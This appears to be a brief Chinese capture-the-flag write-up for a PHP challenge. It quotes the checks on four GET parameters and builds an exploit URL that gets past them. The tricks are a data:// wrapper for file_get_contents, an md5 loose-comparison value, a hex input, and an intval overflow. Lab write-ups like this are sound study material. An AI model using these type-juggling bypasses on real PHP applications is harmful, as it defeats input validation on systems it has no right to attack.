根据1
2
3
4
5
6
7
8
9
10
11
12
13
14
15if(@file_get_contents($k1)==="Hello World!"){
echo '你好啊!<br>';
if(md5($k2)>666666*666666)
{
$k3=$_GET['a3'];
$k4=$_GET['a4'];
if(intval($k3)<666)
{
if($k3==666)
{
echo '加油,就快要成功啦<br>';
if($k4>0)
{
if(intval($k3+$k4)<666)
echo $flag;
可知需要提交4个变量
分别为
a1
a2
a3
a4
其中a1需要提交的是Hello World!
这个字符串
根据这个网站知道了Hello World!
的提交方法
即/index.php?a1=data:text/plain;base64,SGVsbG8gV29ybGQh
提交
成功
返回去
a2的要求是a2的md5的值要大于666666*666666
因此在网上搜到 1518375 的md5符合(其实刚才的网站里有后边的解法只要把key1 key2 key3 key4 换成a1 a2 a3 a4即可)
即/index.php?a1=data:text/plain;base64,SGVsbG8gV29ybGQh&a2=1518375&a3=0x29a&a4=999999999999999999999999999999999999999999999999996666
得到flag